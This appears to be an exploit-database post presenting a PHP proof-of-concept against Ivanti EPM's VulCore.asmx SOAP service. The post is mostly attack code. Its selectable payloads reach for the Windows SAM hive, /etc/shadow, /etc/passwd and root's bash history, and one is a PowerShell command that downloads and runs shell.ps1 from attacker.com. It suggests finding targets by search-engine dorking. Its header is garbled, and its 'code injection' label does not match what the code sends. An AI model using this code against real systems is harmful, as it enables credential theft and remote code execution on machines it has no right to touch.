=============================================================================================================================================
| # Title : Ivanti EPM =============================================================================================================================================
| # Title : Ivanti EPM v1.0 PHP Code Injection Vulnerability |
| # Author : indoushka |
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 135.0.1 (64 bits) |
| # Vendor : https://forums.ivanti.com/s/article/Security-Advisory-EPM-January-2025-for-EPM-2024-and-EPM-2022-SU6?language=en_US |
=============================================================================================================================================

POC :

[+] Dorking ?n Google Or Other Search Enggine.

[+] This code contains : exploit a vulnerable web service that processes requests via SOAP. to RCE command execution vulnerabilities.

[+] save code as poc.php .

[+] USage : cmd => c:\www\test\php poc.php -u <URL> -t <TARGET> -p <PAYLOAD_TYPE>\nAvailable payloads: default, sam, secret, powershell, linux_passwd, linux_shadow, linux_bash_history

[+] Change the target link of the two lines = 9 + 27

[+] PayLoad :

<?php

function exploit($url, $relay_target, $payload_type) {
$payloads = [
"default" => "\\$relay_target\\tmp\\file1.txt",
"sam" => "\\$relay_target\\C$\\Windows\\System32\\config\\SAM",
"secret" => "\\$relay_target\\C$\\Users\\Public\\secret.txt",
"powershell" => "powershell.exe -Command \"IEX(New-Object Net.WebClient).DownloadString('http://attacker.com/shell.ps1')\"",
"linux_passwd" => "/etc/passwd",
"linux_shadow" => "/etc/shadow",
"linux_bash_history" => "/root/.bash_history"
];

$wildcard = $payloads[$payload_type] ?? $payloads["default"];

$xml_payload = <<<XML
<?xml version="1.0" encoding="utf-8"?>
<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
<soap:Body>
<GetHashForWildcardRecursive xmlns="http://tempuri.org/">
<wildcard>$wildcard</wildcard>
</GetHashForWildcardRecursive>
</soap:Body>
</soap:Envelope>
XML;

$headers = [
"Content-Type: text/xml",
"Soapaction: http://tempuri.org/GetHashForWildcardRecursive"
];

$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, "$url/WSVulnerabilityCore/VulCore.asmx");
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, $xml_payload);
curl_setopt($ch, CURLOPT_HTTPHEADER, $headers);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_TIMEOUT, 30);

$response = curl_exec($ch);
$http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);
curl_close($ch);

echo $response . "\n";
echo "HTTP Status Code: " . $http_code . "\n";
}

$options = getopt("u:t:p:", ["url:", "target:", "payload:"]);
if (!isset($options['u']) || !isset($options['t'])) {
die("Usage: php script.php -u <URL> -t <TARGET> -p <PAYLOAD_TYPE>\nAvailable payloads: default, sam, secret, powershell, linux_passwd, linux_shadow, linux_bash_history\n");
}

$payload_type = $options['p'] ?? "default";
exploit($options['u'], $options['t'], $payload_type);

Greetings to :=====================================================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
===================================================================================================